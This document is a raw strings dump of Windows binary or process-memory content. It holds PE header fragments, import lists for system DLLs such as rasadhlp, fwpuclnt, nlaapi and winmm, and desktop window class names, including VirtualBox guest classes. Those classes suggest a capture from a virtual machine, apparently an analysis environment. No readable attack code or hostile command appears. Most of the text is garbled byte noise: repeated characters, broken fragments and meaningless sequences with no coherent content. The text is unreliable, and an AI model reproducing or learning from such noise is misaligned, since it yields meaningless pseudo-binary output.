"""""""""""""""""""""""""""""""-" 3333333333 333330 333333 333333333333 ^TT23)__""""TT""""33""""""""2"""3_________0000002`a`a`33___))"33 bbbbbbbbbbbcbcbcbcbcbcbcbcbcbcbcbcbbcbcbcbbbbbbccbccbccbccbccbbbbbbbbbbbbbbbbbbbbbbbbb ddeefgbhiiiiiiiiiiijijijijijijijijijijijijiijijijiiiiiijjijjijjijjijjiiiiiiiiiiiiiiiikikkiijkkjjjjlmnok ))))))))))) pppppppppppppppppppppppppppppppppppp)))))))))))))))))))))))))) 44DDDD4444444444kkkkkkkkkkkkkkkk 444444444444433 DDDDDDDDDD4444444444 3JJJJJJJJJJJJJJJ44444444444433344JJJJJJJJJJJJJJJ4444444444443333qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq 444444433334444444444444444444334444444444444443P ________________ ______ ____ @ @ @ @ @ @ @ @ )))))))))))))"""FFFFFFFFFF)) $%$%$%$%$%$%)0111" 00"-$%$%$%$% 0 @ @ P ` @ 3333333-----------$%$%$%$%$%$%$%%%$%$%$%$%$%$%$%)%%%%%%%%$%$%$$%$%$%$%$%-44$% ))))) ))1)))1))))1)))))))EE>>E3333 ))))"""" DD))))))))))))))))))DEEEEEEEEEEEEEEE0 66 !@ 0! @ @ @ @!P!@ @ `!p!p ))))))>>>>>000r6)))))))>>>>>>>>111DN )))))))))>>>>>>EE>>DD11 )))1))))))))1D FFFFFFFFFF 6666@ @ )))) @ @ @ @ @ @ @ @ @ @ P" ssssssssssssssss "tttttttttttttttt "DDDDDDDDDDDDDDDD "______________ ))))))))))) __________ #@ @ @ # %%%%%%% %%%%% 808888888888Z8888888888888 88888 888888888888 8888888888888`#p# 88888888888888"" 8888888888888888888888 888888888888:3 @$"""""""""" 0000000 "22"""""""""""""<"< "<""2"""""";""Zu33\ 2v;2 88888 88888888888888888888888 TTxyxTzTTT{|}|~ % %0%@%P%`%p% a 4 < < #2 < +2 < 32 < 72 < ;2 < ?2 < C2 < G2 < K2 < O2 < S2 < W2 < [2 < _2 8.t1Dev Xg.t Xg.t +.t1dDr .t1dDr 8.t1Dev Xg.t Xg.t .t1dDr 1CvG 1dBm .t1dDr 1CvG .t1dDr +.t1dDr .t1dDr 1CvG 1CvG 1dBm 1dBm C:\Windows\fonts 8.t1FCo L/.t FAIL IIMM EMF GIF89aGIF87a texi[whZvgZufYtfXteXsdWrcVqcVoaTn`Tn`Sm_Sl^Rk]Qj]Qi\Ph[OgZNfYMeXMdWLcWKbVKaUJaTI`TI_SH_SH^RG]QG\QF[PE[PE[OEZNDZNDYNCYNCXMCXMCXMCXMCXMCXMCXMCXMCXMCXMCXMCXMCXMCXMCXMChZO texi[whZvgZufYtfXteXsdWrcVqcVoaTn`Tn`Sm_Sl^Rk]Qj]Qi\Ph[OgZNfYMeXMdWLcWKbVKaUJaTI`TI_SH_SH^RG]QG\QF[PE[PE[OEZNDZNDYNCYNCXMCXMCXMCXMCXMCXMCXMCXMCXMCXMCXMCXMCXMCXMCXMChZO sdWsdWsdXsdXsdXufYufYufYufYufYvgZvgZwgZwgZsdW/ !This program cannot be run in DOS mode. .text `.rsrc @.reloc #32769 Message #32774 #32772 COMTASKSWINDOWCLASS IME MSCTFIME UI MSCTFIME Composition CicLoaderWndClass #32772 Dwm IME Ghost #32772 IME DDEMLMom MSCTFIME UI MSCTFIME Composition DDEMLEvent OleMainThreadWndClass WorkerW OleDdeWndClass Shell_TrayWnd Button Button bt`& TrayNotifyWnd TrayClockWClass #32772 TrayShowDesktopButtonWClass #43 tooltips_class32 SysLink CLIPBRDWNDCLASS ReBarWindow32 NotifyIconOverflowWindow bt`1 SysPager ToolbarWindow32 $kXH bt`& MSTaskSwWClass EW_1 #btpA OleMainThreadWndClass MSTaskListWClass TaskListOverlayWnd SysShadow TaskListThumbnailWnd DV2ControlHost DesktopProgramsMFU DesktopDestinationList DesktopSpecialFolders Desktop User Pane Desktop More Programs Pane DesktopLogoffPane Desktop NSCHost Desktop OpenBox Host Desktop Search Open View Desktop top match Desktop User Picture SysListView32 2`bt 2`bt SysHeader32 H `ZH 2`bt NamespaceTreeControl btpe Static Static at0g SysTreeView32 bt`& Search Box SearchEditBoxWrapperClass DirectUIHWND RICHEDIT50W _SearchEditBoxFakeWindow 2`bt AUTHUI.DLL: Shutdown Choices Message Window bt`& 2`bt Progman MenuSite H vVH IME SHELLDLL_DefView %kXH VBoxTrayToolWndClass CabinetWClass MSCTFIME UI MSCTFIME Composition ANIMATION_TIMER_HWND OleMainThreadWndClass VBoxSharedClipboardClass VBoxTrayDnDWnd CLIPBRDWNDCLASS SystemTray_Main ATL:741C3188 MMDEVAPI MS:SyncNotificationWindow Media Center SSO AltTab_KeyHookWnd TaskSwitcherOverlayWnd TaskSwitcherWnd WPDShServiceObject 0000:0 MS_WebcheckMonitor NativeFontCtl PNIHiddenWnd ATL:72EE8158 BluetoothNotificationAreaIconWindowClass msctls_statusbar32 SysTabControl32 msctls_trackbar32 msctls_updown32 msctls_progress32 msctls_hotkey32 SysAnimate32 ComboBoxEx32 IMAPI2 Notification Window Iiit FaxMonWinClass{3FD224BA-8556-47fb-B260-3E451BAE2793} hreadWndClass BrowserFrameGripperClass SysIPAddress32 Edit Edit ListBox Iiit ListBox ComboBox pgit ComboBox ComboLBox Iiit ComboLBox ScrollBar ScrollBar ReaderModeCtl tatusbar32 iew32 2`bt msctls_trackbar32 SysPager AfxWnd100u ress32 dow32 Ex32 SysMonthCal32 tatusbar32 SysHeader32 MFCLink TravelBand te32 Button Breadcrumb Parent Address Band Root UniversalSearchBand ShellTabWindowClass BaseBar u2>v SysFader 0000:0:00000000:00000000:0066018B ntrol32 iew32 rackbar32 #32770 Explorer_Server MSCTFIME UI SHBrowseForFolder ShellNameSpace Control Composition +Jv ExplorerBrowserNavigation PropertyTipBar ScrollItemWindow #43 +Jv deCtl CLIPBRDWNDCLASS Composition IME CtrlNotifySink MSCTFIME UI #32768 imePick32 Edit DUIViewWndClassName etaddress OrView100u Shell Preview Extension Host RelMonGraphWindow dEdit utton Ghost rogress32 te32 Shell Preview Extension Host Foreground Msg pdateNotificationWindow ProfUIS-DockBar Auto-Suggest Dropdown cObject View omboBox NativeHWNDHost pdown32 rogress32 msctls_hotkey32 SysPager rtyGrid List IME Tree tBox NativeFontCtl Shell Embedding #32772 MSCTFIME UI XBabyHost ContentExpandWnd #32772 hreadWndClass Button rowse #32770 0000:8:00010003:01100058:00000000 barW #32768 omboBox dres{ ru2t URL Moniker Notification Window .Nw" Explorer_Hidden indow32 dow32 _class32 Button UIAInvokeHelperWndClass FloatNotifySink PropertyControlBase ru2t GDI+ Hook Window Class NativeFontCtl MSCTFIME Composition ComboBoxEx32 ress32 Iiit pgit indowClass hreadWndClass %uCG wzFY w:bY wbPY '.Kw wzFY 0'pZ# LMEM LMEM wbPY '.Kw z2wX wzFY wbPY whG( wxG( whG( thmfile wBPY =%awl uHO* u0f) \Htp ]Ht( \Ht( u2t( ru2t( u09) w09) ru2t wZZY ru2t DGEt DGEt wZZY DGEt w09) uDGEt 'y2t Fx2t w6x2t 6x2t !This program cannot be run in DOS mode. }@52}KM }@54}ZM }@55}HM }@5$}dM }@5#}ZM }@53}HM }@56}HM }RichIM .text `.data .rsrc @.reloc msvcrt.dll API-MS-Win-Core-ErrorHandling-L1-1-0.dll API-MS-Win-Core-Interlocked-L1-1-0.dll API-MS-Win-Core-Misc-L1-1-0.dll API-MS-Win-Core-ProcessThreads-L1-1-0.dll API-MS-Win-Core-Profile-L1-1-0.dll NTDLL.DLL API-MS-Win-Core-String-L1-1-0.dll API-MS-Win-Core-Synch-L1-1-0.dll API-MS-Win-Core-SysInfo-L1-1-0.dll VW9E @_^[] h|Bpnd VW9E @_^[] Y__^[ @+>b]>q Y__^[ j=2K ?UUUUUU _X-} TUUUU Dz@P v79E t NN 0@@f _^[] 0@@f v79E t NN 0@@f t%Vh t%WhjC t%Vh t%Vh~D t%Wh t%Wh t%Wh t%WhCK t%Wh 7j8V t%Wh 7j8V t%Wh 7j4V t%Wh7W 7j4V t%Vh 6j,W t%VhI_ 6j,W t%Vh 6j,W t%Vh5x 6j,W t%Vh 6j,W t%Vh 6j,W t%Wh t%Wh6a t%Wh t%Wh&b t%Vh3c t%Vh_d t%Vh t%VhLe t%Wh t%Whpf t%Vh t%VhYg _^[t _^[] F$PP 8_(t YY| < YY| < 8_(t 8_(t YY| < YY| < 8_(t _^[] _^[] _^[] _^[] 0@@f 0@@f uL8E uL8E uL8E uL8E uL8E uL8E uL8E uL8E u1j, uL8E u1j, uL8E u1j, uL8E u1j, uL8E uL8E t%Vh t%Whx t%Wh t%WhC t%Vh t%Wh t%Wh t%Wh SVWj 0@@f 0@@f SVWj kVWj0 uFj+ u?j+ @t#W @t1= u$PW |$<9 uJj+ tpj0 k<0Y |&<9 ^89^Du ^89^Du t%Vh: 6jTW t%Vh8 6jTW _^[] k_^] _^[] 0@@f x_^] k_^] 80uZ tV rp_^ rp_[ PVhy-rp QRPh uMRRS QRPh 95rp k/rp F j1rp F(*2rp QQSVW rpV WWWW rp_; Urphi rp1E rp=@ rpjB SVj: SVj; SVj< rpSj rpSj hD)rpj rphD)rpj hD)rpj rp=@ VhD)rpj rp=@ hD)rpj rp=@ hD)rpj rp=@ hD)rpj hD)rpj H%&' LrptLrp}lrp. +rp=vrpTvrp j+rp K\F\ K\HI K\F\ K\F\ %\F\ %\F\ %\F\ %\F\, rpp-rp 4)rp ()rpj RWj" -rp; rp=@ rptL tFVh -rpj rp=@ -rpj Ht!Ht FY;u FY;u 9}$u 9} u 9}(t- (9}$t 9} t 9}(t API-MS-Win-Security-SDDL-L1-1-0.dll WS2_32.dll ConvertStringSecurityDescriptorToSecurityDescriptorW WSAEnumNameSpaceProvidersExW KERNEL32.dll RPCRT4.dll API-MS-Win-Security-Base-L1-1-0.dll API-MS-Win-Core-ProcessThreads-L1-1-0.dll API-MS-Win-Core-LocalRegistry-L1-1-0.dll ntdll.dll msvcrt.dll _amsg_exit memset ??3@YAXPAX@Z qsort_s _wcsicmp _vsnwprintf _XcptFilter _except_handler4_common _onexit _lock __dllonexit _unlock ??2@YAPAXI@Z _initterm free memcpy malloc EtwGetTraceEnableFlags EtwGetTraceEnableLevel EtwGetTraceLoggerHandle EtwRegisterTraceGuidsW EtwUnregisterTraceGuids EtwTraceMessage RegQueryValueExW RegOpenKeyExW RegNotifyChangeKeyValue RegCloseKey OpenProcessToken GetCurrentThread OpenThreadToken GetCurrentProcess GetCurrentThreadId GetCurrentProcessId TerminateProcess GetTokenInformation CopySid IsValidSid GetLengthSid CreateWellKnownSid EqualSid NdrAsyncClientCall NdrClientCall2 UuidToStringW RpcAsyncInitializeHandle RpcSsDestroyClientContext RpcStringBindingComposeW RpcBindingFromStringBindingW RpcBindingSetObject RpcBindingSetAuthInfoExW RpcBindingFree RpcStringFreeW RpcAsyncCancelCall RpcAsyncCompleteCall WaitForSingleObject RegisterWaitForSingleObject UnregisterWaitEx SetLastError WaitForMultipleObjects DuplicateHandle SleepEx InterlockedExchange Sleep QueryPerformanceCounter GetTickCount GetSystemTimeAsFileTime UnhandledExceptionFilter SetUnhandledExceptionFilter CloseHandle CreateEventW LocalFree DeleteCriticalSection InitializeCriticalSectionAndSpinCount LeaveCriticalSection EnterCriticalSection LoadLibraryExA InterlockedCompareExchange FreeLibrary GetLastError GetProcAddress DelayLoadFailureHook DisableThreadLibraryCalls SetEvent I?.4 !This program cannot be run in DOS mode. ERich .text `.data .rsrc @.reloc msvcrt.dll ntdll.dll API-MS-Win-Core-ErrorHandling-L1-1-0.dll API-MS-Win-Core-Handle-L1-1-0.dll API-MS-Win-Core-Interlocked-L1-1-0.dll API-MS-Win-Core-LibraryLoader-L1-1-0.dll API-MS-Win-Core-LocalRegistry-L1-1-0.dll API-MS-Win-Core-Misc-L1-1-0.dll API-MS-Win-Core-ProcessThreads-L1-1-0.dll API-MS-Win-Core-Profile-L1-1-0.dll API-MS-Win-Core-String-L1-1-0.dll API-MS-Win-Core-Synch-L1-1-0.dll API-MS-Win-Core-SysInfo-L1-1-0.dll API-MS-Win-Core-DelayLoad-L1-1-0.dll rasadhlp.dll AcsHlpNbConnection WSAttemptAutodialAddr WSAttemptAutodialName WSNoteSuccessfulHostentLookup rasadhlp.dll AcsHlpNbConnection WSAttemptAutodialAddr WSAttemptAutodialName WSNoteSuccessfulHostentLookup ujSSh ,VhD VVVj VW9E @_^[] Y__^[ u 9u 95H0 WVVVV RSVVh PVVW QSV3 pVVVVj DnsValidateName_W QSVW j\Yf; QXf;G tBPh uxRRS _^[] ph\0 QRPh WS2_32.dll API-MS-Win-Core-DelayLoad-L1-1-0.dll API-MS-Win-Core-SysInfo-L1-1-0.dll API-MS-Win-Core-Synch-L1-1-0.dll API-MS-Win-Core-String-L1-1-0.dll API-MS-Win-Core-Profile-L1-1-0.dll API-MS-Win-Core-ProcessThreads-L1-1-0.dll API-MS-Win-Core-Misc-L1-1-0.dll API-MS-Win-Core-LocalRegistry-L1-1-0.dll API-MS-Win-Core-LibraryLoader-L1-1-0.dll API-MS-Win-Core-Interlocked-L1-1-0.dll API-MS-Win-Core-Handle-L1-1-0.dll API-MS-Win-Core-ErrorHandling-L1-1-0.dll ntdll.dll msvcrt.dll memcpy memset _except_handler4_common _strlwr _XcptFilter malloc free _initterm _amsg_exit NtCreateFile RtlInitUnicodeString NtDeviceIoControlFile UnhandledExceptionFilter SetUnhandledExceptionFilter GetLastError CloseHandle InterlockedExchange InterlockedCompareExchange FreeLibrary DisableThreadLibraryCalls LoadLibraryExA GetProcAddress LoadLibraryExW RegCloseKey RegQueryValueExW RegOpenKeyExW LocalFree LocalAlloc Sleep GetCurrentProcessId TerminateProcess GetCurrentProcess GetCurrentThreadId QueryPerformanceCounter WideCharToMultiByte CreateEventW WaitForSingleObject GetSystemTimeAsFileTime GetTickCount DelayLoadFailureHook RSDS rasadhlp.pdb !This program cannot be run in DOS mode. >Rich .text `.data .rsrc @.reloc qwHu6 PhFwppj t$SW t(RW PhFwppj PhFwpp PhFwpp t%9u PhFwpp Ht#Hu PhFwpp N,QP N,QP N,QP FwppDeepCopyToVerIndependent_FWPM_PROVIDER_CONTEXT0 N,QP N,QP onHashTable =Z)_ BOUTBOUND INBOUND ULongMult q9>b eW?E w[M`Z B!rV B!rV FwppProxyEngineSetOption FwpmEngineSetOption0 QQSVW3 C!rV C!rV FwppProxyEngineGetSecurityInfo FwpmEngineGetSecurityInfo0 VW3 D!rW PhlD!rW FwppProxyEngineSetSecurityInfo FwpmEngineSetSecurityInfo0 h0E!rV E!rV FwppProxySessionCreateEnumHandle FwpmSessionCreateEnumHandle0 E!rV E!rV FwppProxySessionEnum FwpmSessionEnum0 tI9u hTF!rV Ph<8!rV FwpmSessionDestroyEnumHandle0 h0G!rS A#rW F!rS BfeRpcTransactionAbort FwppProxyTransactionAbort FwpmTransactionAbort0 H!rS A#rW G!rS BfeRpcProviderDeleteByKey FwppProxyProviderDeleteByKey FwpmProviderDeleteByKey0 H!rV H!rV FwppProxyProviderGetByKey FwpmProviderGetByKey0 h\I!rV Ph8I!rV FwppProxyProviderCreateEnumHandle FwpmProviderCreateEnumHandle0 J!rV I!rV FwppProxyProviderEnum FwpmProviderEnum0 tI9u J!rV Ph<8!rV FwpmProviderDestroyEnumHandle0 QQSVW3 hxK!rV PhPK!rV FwppProxyProviderGetSecurityInfoByKey FwpmProviderGetSecurityInfoByKey0 VW3 hpL!rW PhHL!rW FwppProxyProviderSetSecurityInfoByKey FwpmProviderSetSecurityInfoByKey0 M!rW FwpmProviderUnsubscribeChanges0 M!rV M!rV FwppProxyProviderSubscriptionsGet FwpmProviderSubscriptionsGet0 N!rS Ph|N!rS BfeRpcProviderContextDeleteById FwppProxyProviderContextDeleteById FwpmProviderContextDeleteById0 ht8!rV PhTO!rV FwppProxyProviderContextGetById P!rV O!rV FwppProxyProviderContextCreateEnumHandle h0 #rV BfeRegQueryBinary QQVW3 u#9} #rV BfeRegDeleteAllValues tIV; t&WVVS @@#r !#rV _^[] BfeRegDeleteKey RegDeleteKeyExW RegDeleteKeyTransactedW QQVW3 u"9} hp"#rV BfeRegDeleteAllSubKeys H@#r L@#r P@#r T@#r d@#r QRPh %d@#r `@#r %`@#r p@#r QRPh %p@#r l@#r %l@#r rh\H#r PhtH#r QRPh x@#r |@#r D%#rVj WfpStopTimer rPh %#rj DeleteTimerQueueEx ~$V3 t.SP rPh &#rS &#rW WfpSysTimerStop DeleteTimerQueueTimer <@#r 8@#r @@#r ADVAPI32.dll AUTHZ.dll ktmw32.dll DNSAPI.dll WS2_32.dll RegCloseKey SetThreadToken RevertToSelf GetTokenInformation OpenProcessToken OpenThreadToken CopySid GetLengthSid RegCreateKeyExW RegOpenKeyExW RegQueryValueExW RegSetValueExW RegDeleteValueW RegNotifyChangeKeyValue RegOpenKeyTransactedW RegCreateKeyTransactedW RegDeleteKeyTransactedW AuthzFreeResourceManager AuthzInitializeContextFromSid AuthzFreeContext AuthzAccessCheck AuthzInitializeResourceManager CreateTransaction CommitTransaction DnsQuery_W DnsFree FreeAddrInfoW WSAIoctl GetAddrInfoW RPCRT4.dll KERNEL32.dll ntdll.dll msvcrt.dll _except_handler4_common _amsg_exit _initterm free malloc _XcptFilter _wcslwr _wcsicmp _wcslwr_s wcschr memset memcpy EtwGetTraceEnableFlags EtwGetTraceEnableLevel EtwGetTraceLoggerHandle EtwRegisterTraceGuidsW EtwUnregisterTraceGuids EtwTraceMessage RtlGetSaclSecurityDescriptor RtlGetDaclSecurityDescriptor RtlGetGroupSecurityDescriptor RtlGetOwnerSecurityDescriptor RtlSetSaclSecurityDescriptor RtlSetDaclSecurityDescriptor RtlSetGroupSecurityDescriptor RtlSetOwnerSecurityDescriptor RtlCreateSecurityDescriptor RtlCopySid RtlLengthSid RtlValidSid RtlEqualSid RtlNtStatusToDosError EtwEventRegister EtwEventUnregister EtwEventActivityIdControl EtwEventWrite EtwEventEnabled RtlCreateHashTable RtlInsertEntryHashTable RtlRemoveEntryHashTable RtlLookupEntryHashTable RtlGetNextEntryHashTable RtlInitEnumerationHashTable RtlEnumerateEntryHashTable RtlAbsoluteToSelfRelativeSD RtlGetControlSecurityDescriptor RtlLengthSecurityDescriptor NtQueryObject RtlGetThreadPreferredUILanguages RtlEndEnumerationHashTable RtlDeleteHashTable RtlContractHashTable RtlExpandHashTable InterlockedExchangeAdd RegDeleteKeyExW RegEnumValueW RegEnumKeyExW CreateFileW ExpandEnvironmentStringsW CompareStringW InterlockedCompareExchange64 SetUnhandledExceptionFilter UnhandledExceptionFilter TerminateProcess GetCurrentProcessId QueryPerformanceCounter InterlockedExchange QueueUserWorkItem GetTickCount HeapReAlloc HeapDestroy DeleteTimerQueueEx Sleep LeaveCriticalSection TryEnterCriticalSection EnterCriticalSection DeleteCriticalSection InitializeCriticalSectionAndSpinCount GetThreadId GetCurrentThreadId GetModuleHandleExA CreateThread FreeLibraryAndExitThread GetCurrentThread RegisterWaitForSingleObject CreateEventW UnregisterWaitEx SetEvent OpenEventW GetProcessHeap HeapAlloc CreateSemaphoreW InterlockedDecrement ReleaseSemaphore InterlockedIncrement WaitForSingleObject GetSystemTimeAsFileTime DeleteTimerQueueTimer HeapCreate HeapFree DisableThreadLibraryCalls DelayLoadFailureHook GetProcAddress GetLastError FreeLibrary InterlockedCompareExchange LoadLibraryExA CloseHandle DuplicateHandle GetCurrentProcess OpenProcess GetModuleHandleExW MesDecodeBufferHandleCreate RpcAsyncInitializeHandle NdrMesTypeEncode2 NdrMesTypeDecode2 NdrClientCall2 NdrAsyncClientCall RpcBindingFree RpcBindingBind I_RpcExceptionFilter RpcSsDestroyClientContext RpcBindingSetOption RpcBindingCreateW RpcAsyncCompleteCall MesEncodeDynBufferHandleCreate MesHandleFree RSDS fwpuclnt.pdb "rn&#rd&#rx&#r "#r@ >##r p0 r_ xb r A#rH p=!r =!r dB#rdB#rlB#rlB#rtB#rtB#r !This program cannot be run in DOS mode. >vRich .text `.data .rsrc @.reloc jqwT OqwW Z}wC3}w Wqwf FqwR qwj]pw qwn) -qwt pwPr Y__^[ K\HI K\F\ K\F\ K\HI K\F\ K\F\ SSSS S;F UTLh 8_[V s_^[] v>+u Vj,j t29^ t-W3 G;>r _^[] d:\win7sp1_gdr\net\nla\appapi\src\qcache.c _^[] u{9] WPQR xSVW3 PjZh shAPIc shAPIc s_^; shAPIc ukjD shAPIc s9>v G;>r [_^] nlaapi.dll NSPStartup NlaAddToPluginRequests NlaAddToTypeSet NlaAnd NlaCloseQuery NlaComposeNetSignature NlaCreateFilter NlaCreatePluginRequests NlaCreateTypeSet NlaDecomposeNetSignature NlaDeleteDataSet NlaDeleteFilter NlaDeletePluginRequests NlaDeleteTypeSet NlaEqual NlaEqualNetSignatures NlaGetInternetCapability NlaGetIntranetCapability NlaNotEqual NlaOpenQuery NlaOr NlaQueryNetData NlaQueryNetDataEx NlaQueryNetSignatures NlaRefreshQuery NlaRegisterQuery d:\win7sp1_gdr\net\nla\appapi\src\nlaapi.c QSVW u';>s# _^[] [^_] APIcV DSVW3 Y_8] sj0Z APIcV APIcV VW9E @_^[] u 9u j@hNQryh shAPIc d:\win7sp1_gdr\net\nla\appapi\src\dllmain.c Vjr3 t}SVW t 9{ _^[] VSj S | ;M QQSV3 SVW3 92t 9r t6;2s- GF9] u~8] SVWh shAPIc WWWW WWWW shAPIcW F$;F u 9N|u WsMb j0[SWV SWhD UTLh QRPhd uMRRS 1f;2u ;O`sU 1f;2u ;O`s ;G`r GH;GD Gd;G` SSSS PSSSS IIu shm' +F<[ v$Vh v$Vh QRPhD M0QP M,QP M(QP M$QP M QP v$Vh F,;M v$Vh QSV3 jWXAF _^[] _^[] _^[] USER32.dll IPHLPAPI.DLL IsWindow PostMessageW GetIfEntry GetAdapterIndex KERNEL32.dll RPCRT4.dll API-MS-Win-Core-LocalRegistry-L1-1-0.dll ntdll.dll msvcrt.dll _except_handler4_common _amsg_exit _initterm free malloc _XcptFilter wcscpy_s wcsncmp wcstombs_s wcsncpy_s memset memcpy NtQueueApcThread NtSetIoCompletion RtlCompareMemory RtlNtStatusToDosError EtwTraceMessage EtwUnregisterTraceGuids EtwRegisterTraceGuidsW EtwGetTraceLoggerHandle EtwGetTraceEnableLevel EtwGetTraceEnableFlags RegOpenCurrentUser RegSetValueExW RegDeleteValueW RegCreateKeyExW RegCloseKey RegQueryInfoKeyW RegEnumValueW RegQueryValueExW RpcAsyncCompleteCall I_RpcExceptionFilter RpcAsyncCancelCall RpcStringBindingComposeW RpcStringFreeW RpcBindingFromStringBindingW RpcBindingSetOption RpcMgmtInqServerPrincNameW RpcRaiseException RpcBindingSetAuthInfoW RpcBindingFree NdrAsyncClientCall NdrClientCall2 RpcAsyncInitializeHandle RpcSsDestroyClientContext FreeLibrary InitializeCriticalSection ResetEvent InterlockedDecrement InterlockedIncrement InitializeCriticalSectionAndSpinCount CreateEventW CloseHandle DeleteCriticalSection CreateThread SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount GetModuleHandleExW Sleep InterlockedCompareExchange DelayLoadFailureHook GetProcAddress QueryPerformanceCounter LoadLibraryExA InterlockedExchange SetEvent EnterCriticalSection WaitForSingleObject UnregisterWaitEx HeapFree SetLastError HeapReAlloc GetLastError HeapAlloc HeapDestroy HeapCreate GetProcessHeap DisableThreadLibraryCalls RegisterWaitForSingleObject LeaveCriticalSection WlP5 RSDS nlaapi.pdb NQry@ :$Bf !This program cannot be run in DOS mode. Rich, .text `.data .rsrc @.reloc ntdll.dll msvcrt.dll API-MS-Win-Core-LocalRegistry-L1-1-0.dll USER32.dll KERNEL32.dll qwJSrw3 qw"Vqw Trw< qwEWqw5 qwIQuw crwN ]swZ qwfqsw rpw? qwtNrw ysw" w'Wqw pwNnrw7 Gqwf Eqwl qwPr WINMM.dll CloseDriver DefDriverProc DriverCallback DrvGetModuleHandle GetDriverModuleHandle NotifyCallbackData OpenDriver PlaySound PlaySoundA PlaySoundW SendDriverMessage WOW32DriverCallback WOW32ResolveMultiMediaHandle WOWAppExit aux32Message auxGetDevCapsA auxGetDevCapsW auxGetNumDevs auxGetVolume auxOutMessage auxSetVolume joy32Message joyConfigChanged joyGetDevCapsA joyGetDevCapsW joyGetNumDevs joyGetPos joyGetPosEx joyGetThreshold joyReleaseCapture joySetCapture joySetThreshold mci32Message mciDriverNotify mciDriverYield mciExecute mciFreeCommandResource mciGetCreatorTask mciGetDeviceIDA mciGetDeviceIDFromElementIDA mciGetDeviceIDFromElementIDW mciGetDeviceIDW mciGetDriverData mciGetErrorStringA mciGetErrorStringW mciGetYieldProc mciLoadCommandResource mciSendCommandA mciSendCommandW mciSendStringA mciSendStringW mciSetDriverData mciSetYieldProc mid32Message midiConnect midiDisconnect midiInAddBuffer midiInClose midiInGetDevCapsA midiInGetDevCapsW midiInGetErrorTextA midiInGetErrorTextW midiInGetID midiInGetNumDevs midiInMessage midiInOpen midiInPrepareHeader midiInReset midiInStart midiInStop midiInUnprepareHeader midiOutCacheDrumPatches midiOutCachePatches midiOutClose midiOutGetDevCapsA midiOutGetDevCapsW midiOutGetErrorTextA midiOutGetErrorTextW midiOutGetID midiOutGetNumDevs midiOutGetVolume midiOutLongMsg midiOutMessage midiOutOpen midiOutPrepareHeader midiOutReset midiOutSetVolume midiOutShortMsg midiOutUnprepareHeader midiStreamClose midiStreamOpen midiStreamOut midiStreamPause midiStreamPosition midiStreamProperty midiStreamRestart midiStreamStop mixerClose mixerGetControlDetailsA mixerGetControlDetailsW mixerGetDevCapsA mixerGetDevCapsW mixerGetID mixerGetLineControlsA mixerGetLineControlsW mixerGetLineInfoA mixerGetLineInfoW mixerGetNumDevs mixerMessage mixerOpen mixerSetControlDetails mmDrvInstall mmGetCurrentTask mmTaskBlock mmTaskCreate mmTaskSignal mmTaskYield mmioAdvance mmioAscend mmioClose mmioCreateChunk mmioDescend mmioFlush mmioGetInfo mmioInstallIOProcA mmioInstallIOProcW mmioOpenA mmioOpenW mmioRead mmioRenameA mmioRenameW mmioSeek mmioSendMessage mmioSetBuffer mmioSetInfo mmioStringToFOURCCA mmioStringToFOURCCW mmioWrite mmsystemGetVersion mod32Message mxd32Message sndPlaySoundA sndPlaySoundW tid32Message timeBeginPeriod timeEndPeriod timeGetDevCaps timeGetSystemTime timeGetTime timeKillEvent timeSetEvent waveInAddBuffer waveInClose waveInGetDevCapsA waveInGetDevCapsW waveInGetErrorTextA waveInGetErrorTextW waveInGetID waveInGetNumDevs waveInGetPosition waveInMessage waveInOpen waveInPrepareHeader waveInReset waveInStart waveInStop waveInUnprepareHeader waveOutBreakLoop waveOutClose waveOutGetDevCapsA waveOutGetDevCapsW waveOutGetErrorTextA waveOutGetErrorTextW waveOutGetID waveOutGetNumDevs waveOutGetPitch waveOutGetPlaybackRate waveOutGetPosition waveOutGetVolume waveOutMessage waveOutOpen waveOutPause waveOutPrepareHeader waveOutReset waveOutRestart waveOutSetPitch waveOutSetPlaybackRate waveOutSetVolume waveOutUnprepareHeader waveOutWrite wid32Message wod32Message 34GwQ w#:H sVVVVVVVh sj+V sVVV Y__^[ AACCN _^[] t$f9 FFJu sVj# RQWj s_[^ E Pj M Qj uuVW t ;M u;h0 M QPRj ^[_] QQSV sVhd) VW9E @_^[] u 9u @_^[] @_^[] ttVj sWjd_O =L9o< _^[] F0_^] QPh QQSV sQRPh sRRS _^[3 _[^] DNULL SLL/ UmiR ~L9FHt 9FHt 9F`X3_ 3K2C 2i`6 8`8@ 6;"NH >%rJ 9O-k nWh]4. <1yf $bqr: K|4f ;}U2 +/aY pGR_ {6*@ .gnD ~TVI "BKX X!{bh AmA-Tb TbA- BKBKbh~XBKBK!; (~X= XBKBKX BKBK; !{bhbh bhbh SA-a sTbTb TbTb BKTbBK TbBKF bh~X~X= ~X~X IWICFormatConverter IWICPixelFormatInfo IWICBitmapScaler IWICColorContext IWICBitmapEncoder IWICBitmapClipper IWICBitmapFrameEncode IWICFastMetadataEncoder IWICComponentInfo IWICMetadataQueryWriter IWICBitmapFrameDecode IWICBitmapSourceTransform IWICBitmapSource IWICBitmap IWICBitmapLock IWICPalette IWICDevelopRaw IWICBitmapCodecProgressNotification IWICColorTransform IWICBitmapFlipRotator IWICStream IWICFormatConverterInfo IWICMetadataQueryReader IWICEnumMetadataItem IWICDevelopRawNotificationCallback IWICProgressiveLevelControl IWICBitmapDecoderInfo IWICPixelFormatInfo2 IWICImagingFactory IWICBitmapCodecInfo IWICProgressCallback IWICBitmapDecoder IWICBitmapEncoderInfo < f K\F\ K\HI K\F\ WdtH WdtR K\F\ K\F\ %\/Z K\HI K\F\ K\HI K\HI K\F\ K\F\ K\F\ K\F\ K\F\ K\F\ K\F\ K\F\ K\F\ K\HI K\F\ K\F\ K\HI K\F\ K\HI K\F\ K\HI K\F\ GIF87a GIF89a tIME tIME sRGB sRGB iCCP iCCP hIST hIST cHRM cHRM iTXt iTXt bKGD bKGD tEXt tEXt gAMA gAMA 8BIM Photoshop Photoshop Exif Exif JFIF JFIF s3.0 Photoshop cHRM hIST sRGB tIME iTXt GIF87a bKGD gAMA sICC_PROFILE Photoshop tEXt ICC Profile iCCP MbPA s8BIM ICC_PROFILE sAdobe n:Y> !(0)" #*1892+$ %,3:;4-& '.5<=6/7>?????????????????H #>mV w?F%e? ?'>s? :S?MSOFFICE9.0 4IWICMetadataWriter IWICComponentFactory IWICPersistStream IWICMetadataReaderInfo IWICMetadataBlockWriter IWICMetadataBlockReader IWICMetadataReader IWICMetadataWriterInfo IWICStreamProvider IWICMetadataHandlerInfo 